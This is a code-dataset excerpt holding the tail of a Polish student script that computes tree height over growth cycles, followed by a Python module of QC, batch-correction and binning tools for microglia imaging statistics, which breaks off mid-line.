_utopian wylicza wyokość drzewa w metrach po x cyklach\n do prawidłowego funkcjonowania musisz podać liczbę całkowitą, większą od zera\n\n 1 cykl = 6 miesięcy\n\n 0 cykl wysokośc + 1 m\n 1 cykl wysokość x 2\n każdy kolejny cykl parzysty = wysokość + 1 m\n każdy kolejny cykl nieparzysty = wysokość x 2\n \"\"\"\n\n #sprawdzam czy integer i liczba dodatnia (jak nie input wymuszający podanie prawidłowej warto��ci)\n if x >=0 and isinstance(x, int):\n y = 0\n #obliczenia\n while y != x + 1:\n if y == 0:\n wynik = 1\n y = y +1\n elif x != 0:\n if y % 2 == 0:\n wynik = wynik + 1\n y = y +1\n elif y % 2 == 1:\n wynik = wynik * 2\n y = y +1\n #podanie wyniku\n print ('Po',x ,'cyklach wysokość drzewa wyniesie: ',wynik, 'm.')\n else:\n x = input (\"Wprowadź dodatnią całkowitą liczbę cykli\")\n\n\n\n_utopian(9)\n\n\n","repo_name":"zaniuto/homework","sub_path":"Praca domowa 10.06.2019/homework_1.py","file_name":"homework_1.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26221063607","text":"\"\"\" Tools for QC-ing and summarizing the data\n\nFunctions:\n\n* :py:func:`qc_stats_df`: Merge the statistics, QC, and study data frames\n* :py:func:`bin_by_rank`: Bin a population into equally sized bins using the data ranks\n* :py:func:`bin_by_dist`: Bin a population into bins with different kinds of distance spacing\n* :py:func:`calc_bin_edges`: Calculate the edges of bins for :py:func:`bin_by_dist`\n* :py:func:`calc_extended_values`: Calculate additional values from the available values in the dataset\n\n\"\"\"\n\n# Imports\nfrom typing import Optional, Union, Dict, List\n\n# 3rd party\nimport numpy as np\n\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\n\nfrom sklearn.neighbors import BallTree\n\n# Functions\n\n\ndef format_section_id(section: Union[str, float]) -> str:\n \"\"\" Format the section id\n\n :param int/str section:\n The section id as a str/float/int\n :returns:\n A cleanly formatted section number as a string\n \"\"\"\n if isinstance(section, (int, float)):\n if np.isnan(section):\n return ''\n return f's{int(section):02d}'\n if section.startswith('s'):\n section = section[1:]\n if section == '':\n return ''\n return f's{int(section):02d}'\n\n\ndef calc_extended_values(stats_df: pd.DataFrame,\n image_df: Optional[pd.DataFrame] = None,\n norm_method: str = 'div') -> pd.DataFrame:\n \"\"\" Calculate additonal values for the study data\n\n :param DataFrame stats_df:\n The stats database for the image\n :param DataFrame image_df:\n If not None, the image dataframe to calculate normalized intensity\n :param str norm_method:\n How to normalize image intensity values, one of 'sub' or 'div'\n :returns:\n A database extended with new values\n \"\"\"\n # Calculate additional ratios\n if 'SurfaceArea' in stats_df and 'Volume' in stats_df:\n stats_df['SurfaceAreaVolume'] = stats_df['SurfaceArea'] / stats_df['Volume']\n\n # Calculate percentages\n if 'Volume' in stats_df and 'ConvexVolume' in stats_df:\n stats_df['PercentConvex'] = stats_df['Volume'] / stats_df['ConvexVolume'] * 100\n if 'NumSurfaceVoxels' in stats_df and 'NumVoxels' in stats_df:\n stats_df['PercentSurface'] = stats_df['NumSurfaceVoxels'] / stats_df['NumVoxels'] * 100\n if 'NumCoreVoxels' in stats_df and 'NumVoxels' in stats_df:\n stats_df['PercentCore'] = stats_df['NumCoreVoxels'] / stats_df['NumVoxels'] * 100\n if 'SkeletonVoxels' in stats_df and 'SkeletonNumBranchpoints' in stats_df:\n stats_df['PercentBranchVoxels'] = stats_df['SkeletonNumBranchpoints'] / stats_df['SkeletonVoxels'] * 100\n if 'SkeletonVoxels' in stats_df and 'NumVoxels' in stats_df:\n stats_df['PercentSkeleton'] = stats_df['SkeletonVoxels'] / stats_df['NumVoxels'] * 100\n\n # Don't try and run the per-image normalization\n if image_df is None:\n return stats_df\n\n # Make sure we didn't get any weird duplications in the image data\n if 'Dir Prefix' not in image_df.columns:\n image_df['Dir Prefix'] = ''\n if 'Dir Prefix' not in stats_df.columns:\n stats_df['Dir Prefix'] = ''\n\n image_keys = image_df['Dir Prefix'].str.cat(image_df['File Prefix'], sep='-')\n image_dups = image_keys.duplicated()\n\n if np.any(image_dups):\n raise ValueError(f'Got duplicated keys in image data: {image_keys[image_dups]}')\n\n # Merge the image volume values back in\n all_vol_columns = ['Dir Prefix', 'File Prefix']\n all_vol_columns.extend(c for c in image_df.columns\n if c.startswith(('VolumeIntensityMean_', 'VolumeIntensityPct50_')))\n stats_df = stats_df.merge(image_df[all_vol_columns],\n how='left', on=('Dir Prefix', 'File Prefix'),\n validate='many_to_one').copy()\n\n # Create normalized intensity columns\n norm_stats_df = {}\n for column in stats_df.columns:\n if not column.startswith(('Intensity', 'IntensityCore', 'IntensityShell')):\n continue\n if '_Ch=' not in column:\n continue\n if 'NumVoxels' in column:\n continue\n if 'In_Ch=' in column:\n continue\n if f'Norm{column}' in stats_df.columns:\n continue\n\n channel_prefix, channel_num = column.rsplit('_Ch=', 1)\n channel_num = int(channel_num)\n if channel_prefix.endswith(('Min', 'Max', 'Mean', 'Std')) or 'Pct' in channel_prefix:\n vol_column = f'VolumeIntensityMean_Ch={channel_num}'\n else:\n raise KeyError(f'Unknown intensity value column: {column}')\n\n if norm_method.startswith('sub'):\n norm_stats_df[f'Norm{column}'] = stats_df[column] - stats_df[vol_column]\n elif norm_method.startswith('div'):\n norm_stats_df[f'Norm{column}'] = stats_df[column] / (stats_df[vol_column] + 1.0)\n else:\n raise KeyError(f'Unknown intensity normalization method \"{norm_method}\"')\n\n stats_df = pd.concat([stats_df, pd.DataFrame(norm_stats_df)], axis=1)\n\n # Remove the volumetric columns\n for column in all_vol_columns:\n if column in ('Dir Prefix', 'File Prefix'):\n continue\n del stats_df[column]\n return stats_df.copy()\n\n\ndef find_mutual_neighbors(left: np.ndarray, right: np.ndarray,\n dist: Optional[np.ndarray] = None):\n \"\"\" Find mutual nearest neighbors\n\n :param ndarray left:\n The n x k array of neighbors returned by the left ``BallTree.query``\n on the right coordinates\n\n left_tree = BallTree(left_coords)\n left = left_tree.query(right_coords, k=1)\n\n :param ndarray right:\n The m x k array of neighbors returned by the right ``BallTree.query``\n on the left coordinates\n\n right_tree = BallTree(right_coords)\n right = right_tree.query(left_coords, k=1)\n\n :param ndarray dist:\n If not None, the n x k array of distances from left to right\n :returns:\n A p x 2 array of (right, left) pairs that are mutual neighbors\n If ``dist`` is passed, a p x 3 array of (right, left, dist) pairs\n \"\"\"\n if dist is not None:\n assert dist.shape == left.shape\n neighbors = []\n for i, left_inds in enumerate(left):\n for j in left_inds:\n right_inds = right[j, :]\n mask = right_inds == i\n if np.any(mask):\n if dist is None:\n neighbors.append((i, j))\n else:\n neighbors.append((i, j, dist[i, mask][0]))\n if dist is None:\n return np.array(neighbors, dtype=[('right', 'int64'), ('left', 'int64')])\n else:\n return np.array(neighbors, dtype=[('right', 'int64'), ('left', 'int64'), ('dist', 'float64')])\n\n\ndef average_per_cell(delta: np.ndarray,\n mnn: np.ndarray,\n left_neighbors: np.ndarray,\n left_dists: np.ndarray,\n right_neighbors: np.ndarray,\n right_dists: np.ndarray,\n sigma: float = 0.1) -> np.ndarray:\n \"\"\" Implement a gaussian smoothed vector per cell\n\n :param ndarray delta:\n The array of differences between neighbors\n :param ndarray mnn:\n The set of right, left, dist triples for mutual nearest neighbors\n :param ndarray left_neighbors:\n For every element in left, these are the knn in right\n :param ndarray left_dists:\n For every element in left, these are the knn distances in right\n :param ndarray right_neighbors:\n For every element in right, these are the knn in left\n :param ndarray right_dists:\n For every element in right, these are the knn distances in left\n :param float sigma:\n The smoothing kernel applied to the gaussian function\n :returns:\n A vector of offsets to apply to every element in right\n \"\"\"\n assert mnn.shape[0] == delta.shape[0]\n assert left_neighbors.shape == left_dists.shape\n assert right_neighbors.shape == right_dists.shape\n\n # These are the same shape as the right array\n delta_sum = np.zeros((left_dists.shape[0], delta.shape[1]), dtype=np.float64)\n delta_count = np.zeros((left_dists.shape[0], ), dtype=np.float64)\n\n left = mnn['left'] # Indexes into the left array, the same shape as right_neighbors\n right = mnn['right'] # Indexes into the right array, the same shape as left_neighbors\n\n for i in range(mnn.shape[0]):\n # right_mask = right == i\n #\n # delta_sum[i, :] += np.mean(delta[right_mask, :], axis=0)\n # delta_count[i] += 1.0\n #\n #\n #\n # print(i, right_mask, left_mask)\n # assert False\n #\n left_ind = left[i]\n right_ind = right[i]\n\n # For a given point in left, here are all the neighbors in right\n inds = right_neighbors[left_ind, :]\n dist = right_dists[left_ind, :]\n\n # Pull out the delta for this neighbor, and the distance\n key_delta = delta[i:i+1, :]\n\n key_ind = np.nonzero(inds == right_ind)\n assert len(key_ind) == 1\n key_ind = key_ind[0]\n\n # Need a real gaussian for scaling\n weight = np.exp(-0.5*(dist - dist[key_ind])**2/sigma**2)/sigma/np.sqrt(2*np.pi)\n weight = weight[:, np.newaxis]\n\n delta_sum[inds, :] += key_delta*weight\n delta_count[inds] += weight[:, 0]\n\n # Take however much weight we got, if it was less than a full sample\n delta_count[delta_count < 1] = 1.0\n return delta_sum / delta_count[:, np.newaxis]\n\n\ndef remove_batch_effect_mnn(labels: np.ndarray,\n values: np.ndarray,\n num_neighbors: int = 5,\n sigma: float = 1.0) -> np.ndarray:\n \"\"\" Remove the batch effect from a set of values\n\n This implements the mutual nearest neighbors correction proposed in\n Haghverdi et al 2018\n\n :param ndarray labels:\n A 1D vector with labels for each batch\n :param values values:\n A 2D matrix with cells on the rows and values on the columns\n :param int num_neighbors:\n How many mutual neighbors to consider in the dataset\n :param float sigma:\n The smoothing kernel applied to the gaussian function (larger is smoother)\n \"\"\"\n levels = list(sorted(np.unique(labels), key=lambda x: np.sum(labels == x), reverse=True))\n if len(levels) < 2:\n return values\n print(f'Got batch levels: {levels}')\n\n # Step 1 - Cosine normalization\n scales = np.linalg.norm(values, axis=1)[:, np.newaxis]\n values = values / scales\n\n # Step 2 - for each batch, find mutual nearest neighbors\n batches = [values[labels == label, :] for label in levels]\n left_batch = batches.pop(0)\n\n # Left batch is the currently integrated dataset\n # Right batch is the data to integrate\n while batches:\n left_tree = BallTree(left_batch)\n\n right_batch = batches.pop(0)\n right_tree = BallTree(right_batch)\n\n # Seach for nearest neighbors in each direction\n left_dists, left_neighbors = left_tree.query(right_batch, k=num_neighbors,\n return_distance=True)\n right_dists, right_neighbors = right_tree.query(left_batch, k=num_neighbors,\n return_distance=True)\n\n assert left_dists.shape[0] == right_batch.shape[0]\n assert left_neighbors.shape[0] == right_batch.shape[0]\n\n assert right_dists.shape[0] == left_batch.shape[0]\n assert right_neighbors.shape[0] == left_batch.shape[0]\n\n # Pairs of neighbors are our marker cells\n mnn = find_mutual_neighbors(left_neighbors, right_neighbors,\n dist=left_dists)\n\n # For each marker cell, get the delta vector in expression for each gene\n right_points, left_points = mnn['right'], mnn['left']\n delta = left_batch[left_points, :] - right_batch[right_points, :]\n\n # delta = average_per_cell(delta, mnn, left_neighbors, left_dists,\n # right_neighbors, right_dists,\n # sigma=sigma)\n # assert delta.shape == right_batch.shape\n # print(np.mean(delta, axis=0))\n delta = np.median(delta, axis=0)[np.newaxis, :]\n right_batch = right_batch + delta\n\n # Now the left dataset is the sum of the old left data and the newly corrected right\n left_batch = np.concatenate([left_batch, right_batch], axis=0)\n\n # Now left batch has all the data, but in the wrong order\n final_values = np.zeros_like(left_batch)\n idx = 0\n final_means = None\n for label in levels:\n mask = labels == label\n step = int(np.sum(mask))\n\n label_scale = scales[mask, :]\n label_values = left_batch[idx:idx+step, :]*label_scale\n\n if final_means is None:\n final_means = np.mean(label_values, axis=0)[np.newaxis, :]\n offset = np.zeros_like(final_means)\n else:\n offset = final_means - np.mean(label_values, axis=0)[np.newaxis, :]\n\n # Rescale the data back to real values\n final_values[mask, :] = label_values + offset\n idx += step\n\n return final_values\n\n\ndef remove_batch_effect_means(labels: np.ndarray,\n values: np.ndarray,\n mode: str = 'median') -> np.ndarray:\n \"\"\" Remove the batch effect from the data\n\n This method estimates a per-batch mean/std for each column and then equalizes\n them across samples\n\n :param ndarray labels:\n A 1D vector with labels for each batch\n :param values values:\n A 2D matrix with cells on the rows and values on the columns\n :param str mode:\n One of 'mean' or 'median' - which stat to correct with\n :returns:\n A batch corrected version of values\n \"\"\"\n\n levels = list(sorted(np.unique(labels)))\n if len(levels) < 2:\n return values\n print(f'Got batch levels: {levels}')\n\n values = values.astype(np.float64)\n batch_intercept = []\n batch_scale = []\n batch_size = []\n\n for level in levels:\n mask = labels == level\n batch_values = values[mask, :]\n\n if mode == 'mean':\n batch_intercept.append(np.nanmean(batch_values, axis=0))\n batch_scale.append(np.nanstd(batch_values, axis=0))\n elif mode == 'median':\n p25, p50, p75 = np.nanpercentile(batch_values, [25, 50, 75], axis=0)\n batch_intercept.append(p50)\n batch_scale.append(p75 - p25)\n else:\n raise KeyError(f'Unknown rescaling mode: \"{mode}\"')\n\n batch_size.append(np.sum(mask))\n\n # Make the statistics similar to the size-weighted average over all batches\n target_intercept = np.average(batch_intercept, axis=0, weights=batch_size)\n target_scale = np.average(batch_scale, axis=0, weights=batch_size)\n\n final_values = np.zeros_like(values)\n for i, level in enumerate(levels):\n mask = labels == level\n\n intercept = batch_intercept[i]\n scale = batch_scale[i]\n\n # Center, scale then offset again\n batch_values = values[mask, :] - intercept[np.newaxis, :]\n batch_values *= target_scale[np.newaxis, :] / (scale[np.newaxis, :] + 1e-5)\n batch_values += target_intercept[np.newaxis, :]\n\n final_values[mask, :] = batch_values\n return final_values\n\n\ndef drop_na_columns(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Drop columns which are all NA\n\n :param DataFrame df:\n The data frame to clean\n :returns:\n A new data frame with all empty/NA columns dropped\n \"\"\"\n keep_columns = []\n drop_columns = []\n for column in df.columns:\n if np.all(df[column].isna()):\n drop_columns.append(column)\n continue\n if np.all(df[column].apply(str).str.upper().str.strip().isin(['NA', 'NAN', ''])):\n drop_columns.append(column)\n continue\n keep_columns.append(column)\n if drop_columns != []:\n print(f'Dropping NA columns: {drop_columns}')\n if len(keep_columns) < 1:\n raise ValueError(f'No columns to keep in df: {df.columns}')\n return df[keep_columns].copy()\n\n\ndef qc_stats_df(stats_df: pd.DataFrame,\n qc_df: Optional[pd.DataFrame] = None,\n study_df: Optional[pd.DataFrame] = None,\n min_size: Optional[int] = -1,\n max_size: Optional[int] = -1,\n size_column: Optional[str] = 'Volume',\n batch_column: str = 'Batch',\n timepoint_column: Optional[str] = None,\n var_column: Optional[str] = None,\n check_animal_ids: bool = False,\n remove_batch_effect: bool = False,\n good_qc_statuses: Optional[List[str]] = None) -> pd.DataFrame:\n \"\"\" QC and filter the stats data frame\n\n :param DataFrame stats_df:\n The dataframe with the actual stats\n :param DataFrame image_df:\n If not None, the overall image stats\n :param DataFrame qc_df:\n If not None, the dataframe with the QC column\n :param DataFrame study_df:\n The dataframe with the study metadata\n :param int min_size:\n If not None, minimum number of voxels in a surface\n :param int max_size:\n If not None, maximum number of voxels in a surface\n :param str size_column:\n Name of the column to use for size (default: 'Volume')\n :param bool check_animal_ids:\n If True, make sure that all Animal IDs survive QC\n :param bool remove_batch_effect:\n If True, remove the batch effect (requires a 'Batch' column)\n :param str batch_column:\n Name of the column to use for batch regression (default: 'Batch')\n :param list[str] good_qc_statuses:\n The list of values in the \"Status\" column that are considered \"good\"\n :returns:\n A cleaned and QC'ed data frame\n \"\"\"\n if good_qc_statuses is None:\n good_qc_statuses = ['ok', 'okay', 'good']\n elif isinstance(good_qc_statuses, str):\n good_qc_statuses = [good_qc_statuses]\n\n # Clean up the Animal ID column\n stats_df = drop_na_columns(stats_df)\n if qc_df is not None:\n qc_df = drop_na_columns(qc_df)\n if study_df is not None:\n study_df = drop_na_columns(study_df)\n\n if 'Animal ID' in stats_df.columns:\n stats_df['Animal ID'] = stats_df['Animal ID'].apply(str).str.upper().str.strip()\n\n name_columns = ['Animal ID', 'Block', 'Section', 'Dir Prefix', 'File Prefix']\n name_columns = [n for n in name_columns if n in stats_df.columns]\n\n # If the block is non-unique or empty, just ignore it\n if 'Block' in name_columns and len(np.unique(stats_df['Block'])) < 2:\n name_columns.remove('Block')\n\n # Check the QC if we have it\n if qc_df is not None:\n if 'Prefix' in qc_df.columns:\n qc_df = qc_df.rename(columns={'Prefix': 'File Prefix'})\n if 'Status' not in qc_df.columns:\n raise ValueError(f'QC DataFrame should have a \"Status\" column, got: {qc_df.columns}')\n\n qc_df['Status'] = qc_df['Status'].str.lower().str.strip()\n if 'Animal ID' in qc_df:\n qc_df['Animal ID'] = qc_df['Animal ID'].apply(str).str.upper().str.strip()\n if 'Section' in qc_df:\n qc_df['Section'] = qc_df['Section'].map(format_section_id)\n\n okay_mask = qc_df['Status'].isin(good_qc_statuses)\n num_okay = np.sum(okay_mask)\n num_total = okay_mask.shape[0]\n print(f'Got {num_okay}/{num_total} good tiles ({num_okay/num_total:0.1%})')\n\n if 'Status' in stats_df.columns:\n del stats_df['Status']\n value_columns = ['Status']\n for extra_value_column in ['Animal ID', 'Section', 'Region', 'Batch']:\n if extra_value_column not in stats_df.columns and extra_value_column in qc_df.columns:\n value_columns.append(extra_value_column)\n stats_df = stats_df.merge(qc_df[name_columns + value_columns],\n on=name_columns, how='left')\n\n pre_animal_ids = set(np.unique(stats_df['Animal ID']))\n\n okay_mask = stats_df['Status'].isin(good_qc_statuses)\n stats_df = stats_df[okay_mask]\n\n post_animal_ids = set(np.unique(stats_df['Animal ID']))\n\n if post_animal_ids != pre_animal_ids:\n if check_animal_ids:\n raise ValueError(f'Lost some animal IDs during QC: {pre_animal_ids - post_animal_ids}')\n else:\n print(f'Lost some animal IDs during QC: {pre_animal_ids - post_animal_ids}')\n\n # Merge with the study data if we got some\n if study_df is not None:\n study_name_columns = ['Animal ID', 'Block', 'Section']\n study_df['Animal ID'] = study_df['Animal ID'].apply(str).str.upper().str.strip()\n study_name_columns = [c for c in study_name_columns if c in study_df.columns]\n if 'Section' in study_df:\n study_df['Section'] = study_df['Section'].map(format_section_id)\n stats_df = stats_df.merge(study_df, on=study_name_columns, how='inner')\n\n # Filter out bad segmentations\n if 'Surface' in stats_df.columns:\n num_background = stats_df.shape[0]\n stats_df = stats_df[stats_df['Surface'] != 'Background']\n num_background = num_background - stats_df.shape[0]\n print(f'Filtered {num_background} background surfaces ({num_background/stats_df.shape[0]:0.2%})')\n\n if size_column is not None:\n if max_size is not None and max_size > 0:\n stats_df = stats_df[stats_df[size_column] <= max_size]\n if min_size is not None and min_size > 0:\n stats_df = stats_df[stats_df[size_column] >= min_size]\n\n print(f'Got {stats_df.shape} records after filtering')\n\n if remove_batch_effect:\n if batch_column not in stats_df.columns:\n raise KeyError(f'Need \"{batch_column}\" column indicating the batch number: {stats_df.columns}')\n\n category_columns = [\n 'Animal ID', 'Block', 'Section', 'Region', 'File Prefix', 'Filename',\n 'Channel', 'Surface', 'Status', 'Time', 'Timepoint', 'Group', 'Category',\n 'Treatment', batch_column,\n ]\n if timepoint_column is not None:\n category_columns.append(timepoint_column)\n if var_column is not None:\n category_columns.append(var_column)\n\n value_columns = [c for c in stats_df.columns\n if c not in category_columns and is_numeric_dtype(stats_df[c])]\n batch_labels = stats_df[batch_column].values\n old_values = stats_df[value_columns].values\n\n new_values = remove_batch_effect_means(batch_labels, old_values, mode='median')\n # new_values = remove_batch_effect_mnn(batch_labels, old_values,\n # num_neighbors=20, sigma=2.0)\n # new_values = remove_batch_effect_mnn(batch_labels, new_values,\n # num_neighbors=10, sigma=2.0)\n # new_values = remove_batch_effect_mnn(batch_labels, new_values,\n # num_neighbors=5, sigma=2.0)\n for i, value_column in enumerate(value_columns):\n stats_df[value_column] = new_values[:, i]\n\n return stats_df\n\n\ndef calc_bin_edges(bin_min: float,\n bin_max: float,\n bin_spacing: Union[str, float] = 'linear',\n num_bins: int = 3) -> np.ndarray:\n \"\"\" Calculate the edges of bins\n\n :param float bin_min:\n Smallest bin value\n :param float bin_max:\n Largest bin value\n :param str/float bin_spacing:\n Spacing between bins (one of linear, area, volume, log) or an exponent to raise the bins to\n :param int num_bins:\n How many bins to generate\n :returns:\n An array of n+1 bins where bin_edges[0] == bin_min and bin_edges[-1] == bin_max\n \"\"\"\n\n # Different kinds of spacing\n if isinstance(bin_spacing, (int, float)):\n bin_spacing = float(bin_spacing)\n elif bin_spacing in ('log', 'logarithmic'):\n return np.logspace(bin_min, bin_max, num_bins+1)\n elif bin_spacing in ('linear', 'radius', 'radial'):\n # Equal radii spaced bins\n power = 1\n elif bin_spacing in ('area', 'circle', 'circular'):\n # Equal area spaced bins\n power = 2\n elif bin_spacing in ('volume', 'sphere', 'spherical'):\n # Equal volume spaced bins\n power = 3\n else:\n raise ValueError(f'Unknown bin spacing {bin_spacing}')\n\n # Transform, linspace, invert\n d_min = np.abs(bin_min)**power\n d_max = np.abs(bin_max)**power\n bin_edges = np.linspace(d_min, d_max, num_bins+1)\n return bin_edges**(1/power)\n\n\ndef bin_by_dist(rec: np.ndarray,\n num_bins: int = 3,\n bin_spacing: str = 'linear',\n bin_edges: Optional[np.ndarray] = None) -> np.ndarray:\n \"\"\" Bin a set of values into equally sized dist bins\n\n :param ndarray rec:\n The population values to split up\n :param int num_bins:\n The number of bins to split the population into\n :param str bin_spacing:\n How to spread the bins out (a valid argument to :py:func:`calc_bin_edges`)\n :param ndarray bin_edges:\n If not None, use these bin edges regardless\n :returns:\n An array the same shape as rec where ``range(0, num_bins)`` are the\n distances from smallest to largest, and ``num_bins`` is the nan-bin\n \"\"\"\n # If we got pre-supplied bins, just use those\n if bin_edges is not None:\n bin_edges = np.array(bin_edges)\n num_bins = bin_edges.shape[0]-1\n\n # Split the nans out from the other values\n nan_mask = np.isnan(rec)\n labels = np.full(rec.shape, dtype=int, fill_value=num_bins)\n\n if np.all(nan_mask) or num_bins < 1:\n return labels\n\n # Order the data by rank\n real_rec = rec[~nan_mask]\n\n # FIXME: Support ranking methods other than linear\n if bin_edges is None:\n dist_min = np.min(real_rec)\n dist_max = np.max(real_rec)\n bin_edges = calc_bin_edges(bin_min=dist_min,\n bin_max=dist_max,\n bin_spacing=bin_spacing,\n num_bins=num_bins)\n\n # Handle the case where we don't get a left and right edge\n if bin_edges.shape[0] < 2:\n labels[~nan_mask] = 0\n return labels\n assert bin_edges.shape[0] == num_bins+1\n\n # Split each label on the bin size\n real_labels = np.full(real_rec.shape, dtype=int, fill_value=num_bins)\n real_labels[real_rec < bin_edges[0]] = 0\n real_labels[real_rec >= bin_edges[-1]] = num_bins\n\n for i, (dist_low, dist_high) in enumerate(zip(bin_edges[:-1], bin_edges[1:])):\n mask = np.logical_and(real_rec >= dist_low, real_rec < dist_high)\n real_labels[mask] = i\n labels[~nan_mask] = real_labels\n return labels\n\n\ndef bin_by_rank(rec: np.ndarray, num_bins: int = 3) -> np.ndarray:\n \"\"\" Bin a set of values into equally sized rank bins\n\n :param ndarray rec:\n The population values to split up\n :param int num_bins:\n The number of bins to split the population into\n :returns:\n An array the same shape as rec where ``range(0, num_bins)`` are the\n ranks from smallest to largest, and ``num_bins`` is the nan-bin\n \"\"\"\n\n # Split the nans out from the other values\n nan_mask = np.isnan(rec)\n labels = np.full(rec.shape, dtype=int, fill_value=num_bins)\n\n if np.all(nan_mask):\n return labels\n\n # Order the data by rank\n real_rec = rec[~nan_mask]\n order = np.argsort(real_rec)\n\n # Split each label on the bin size\n bin_size = int(np.ceil(order.shape[0]/num_bins))\n bin_st = 0\n real_labels = np.full(real_rec.shape, dtype=int, fill_value=num_bins)\n for i in range(0, num_bins):\n if bin_st >= order.shape[0]:\n break\n bin_ed = min([bin_st + bin_size, order.shape[0]])\n inds = order[bin_st:bin_ed]\n real_labels[inds] = i\n bin_st = bin_ed\n labels[~nan_mask] = real_labels\n return labels\n\n\ndef load_ylabels(channel_names: Optional[Dict[str, str]] = None,\n ylabels: Optional[Dict[str, str]] = None) -> Dict[str, str]:\n \"\"\" Load the standardized names for each feature\n\n :param dict[str, str] channel_names:\n If not None, a mapping of 'Ch=1': 'DAPI', 'Ch=2': 'Iba1', etc\n :returns:\n A list of column name: human readable column name\n \"\"\"\n if ylabels is None:\n ylabels = {}\n\n ylabels.update({\n 'NumVoxels': 'Number of Voxels',\n 'NumCoreVoxels': 'Number of Voxels in the Core',\n 'NumShellVoxels': 'Number of Voxels in the Shell',\n 'CoreRatio': 'Ratio of Core to Total Voxels',\n 'ShellRatio': 'Ratio of Shell to Total Voxels',\n 'Volume': 'Volume $(\\\\mu m^3)$',\n 'SurfaceArea': 'Surface Area $(\\\\mu m^2)$',\n 'SurfaceAreaVolume': 'Surface Area:Volume $(\\\\mu m^{-1})$',\n 'ConvexVolume': 'Convex Volume $(\\\\mu m^3)$',\n 'ConvexVolumeRatio': 'Volume:Convex Volume',\n 'ConvexSurfaceArea': 'Convex Surface Area $(\\\\mu m^2)$',\n 'ConvexSurfaceAreaRatio': 'Surface Area:Convex Hull Surface Area',\n 'BBoxVolume': 'Bounding Box Volume $(\\\\mu m^3)$',\n 'BBoxMinorAxis': 'Bounding Box Minor Axis $(\\\\mu m)$',\n 'BBoxMiddleAxis': 'Bounding Box Mid Axis $(\\\\mu m)$',\n 'BBoxMajorAxis': 'Bounding Box Major Axis $(\\\\mu m)$',\n 'BBoxAspectRatio': 'Bounding Box Aspect Ratio',\n 'EquivSphereRadius': 'Sphere Equiv Radius $(\\\\mu m)$',\n 'PercentCore': '% Core Voxels',\n 'PercentConvex': '% Convexity',\n 'PercentSurface': '% Surface Voxels',\n 'PercentBranchVoxels': '% Branch Voxels',\n 'PercentSkeleton': '% Skeleton Volume',\n 'Sphericity': 'Sphericity',\n 'EllipseAspectRatio': 'Aspect Ratio',\n 'EllipseMajorAxis': 'Major Axis $(\\\\mu m)$',\n 'EllipseMiddleAxis': 'Mid Axis $(\\\\mu m)$',\n 'EllipseMinorAxis': 'Minor Axis $(\\\\mu m)$',\n 'SkeletonNumBranches': 'Number of Branches',\n 'SkeletonNumBranchpoints': 'Number of Branchpoints',\n 'SkeletonNumShortBranches': 'Number of Short Branches',\n 'SkeletonNumLongBranches': 'Number of Long Branches',\n 'SkeletonVoxels': 'Number of Skeleton Voxels',\n 'PercentGliaLarge': '% Large Microglia',\n 'PercentGliaConvex': '% Convex Microglia',\n 'PercentGliaSpherical': '% Spherical Microglia',\n 'PercentGliaElongated': '% Elongated Microglia',\n 'PercentGliaSurface': '% High Surface Area:Volume Microglia',\n 'PercentCells': '% Cells',\n 'TotalGliaLarge': 'Number of Large Microglia',\n 'TotalGliaConvex': 'Number of Convex Microglia',\n 'TotalGliaSpherical': 'Number of Spherical Microglia',\n 'TotalGliaElongated': 'Number of Elongated Microglia',\n 'TotalGliaSurface': 'Number of High Surface Area:Volume Microglia',\n 'ShollNumRadiusBins': 'Number of Sholl Shells',\n 'ShollNumLabels': 'Number of Sholl Branches',\n 'ShollRadiusMax': 'Maximum Sholl Radius $(\\\\mu m)$',\n 'ShollCriticalBranches': 'Branch Voxels at Critical Radius',\n 'ShollCriticalLabels': 'Number of Branches at Critical Radius',\n 'ShollCriticalRadius': 'Critical Radius $(\\\\mu m)$',\n 'ShollSchoenenRamificationIndex': 'Schoenen Ramification Index',\n 'ShollBranchIndex': 'Sholl Branch Index',\n 'ShollRegressionCoeff': 'Sholl Branch Slope',\n 'LacunaMean': 'Mean Lacuna',\n 'LacunaStd': 'Std Lacuna',\n 'LacunaRatio': 'Lacuna Ratio',\n 'LacunaCoeff': 'Lacuna Coefficient',\n 'HausdorffDim': 'Hausdorff Dimension',\n 'HausdorffPrefactor': 'Hausdorff Prefactor',\n })\n\n # Add in the names for the mean/median/std etc\n param_names = {\n 'Mean': 'Mean',\n 'Std': 'Std',\n 'Min': 'Min',\n 'Max': 'Max',\n 'Pct05': '5th Centile',\n 'Pct25': '25th Centile',\n 'Pct50': 'Median',\n 'Pct75': '75th Centile',\n 'Pct95': '95th Centile',\n }\n for key, value in param_names.items():\n ylabels[f'Skeleton{key}BranchLen'] = f'{value} Branch Length (px)'\n for key, value in param_names.items():\n ylabels[f'{key}Radius'] = f'{value} Radius $(\\\\mu m)$'\n\n for channel_id, channel_name in channel_names.items():\n # Sholl Analysis\n ylabels[f'ShollNumRadiusBins_{channel_id}'] = 'Number of Sholl Shells'\n ylabels[f'ShollNumLabels_{channel_id}'] = 'Number of Sholl Branches'\n ylabels[f'ShollRadiusMax_{channel_id}'] = 'Maximum Sholl Radius $(\\\\mu m)$'\n ylabels[f'ShollCriticalBranches_{channel_id}'] = 'Branch Voxels at Critical Radius'\n ylabels[f'ShollCriticalLabels_{channel_id}'] = 'Number of Branches at Critical Radius'\n ylabels[f'ShollCriticalRadius_{channel_id}'] = 'Critical Radius $(\\\\mu m)$'\n ylabels[f'ShollSchoenenRamificationIndex_{channel_id}'] = 'Schoenen Ramification Index'\n ylabels[f'ShollBranchIndex_{channel_id}'] = 'Sholl Branch Index'\n ylabels[f'ShollRegressionCoeff_{channel_id}'] = 'Sholl Branch Slope'\n\n # Fractal Analysis\n ylabels[f'LacunaMean_{channel_id}'] = 'Mean Lacuna'\n ylabels[f'LacunaStd_{channel_id}'] = 'Std Lacuna'\n ylabels[f'LacunaRatio_{channel_id}'] = 'Lacuna Ratio'\n ylabels[f'LacunaCoeff_{channel_id}'] = 'Lacuna Coefficient'\n ylabels[f'HausdorffDim_{channel_id}'] = 'Hausdorff Dimension'\n ylabels[f'HausdorffPrefactor_{channel_id}'] = 'Hausdorff Prefactor'\n\n # Distance Analysis\n ylabels[f'DistMin_{channel_id}'] = f'Min Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistMean_{channel_id}'] = f'Mean Distance to {channel_name} $(\\\\mu m)$'\n ylabels[f'DistStd_{channel_id}'] = 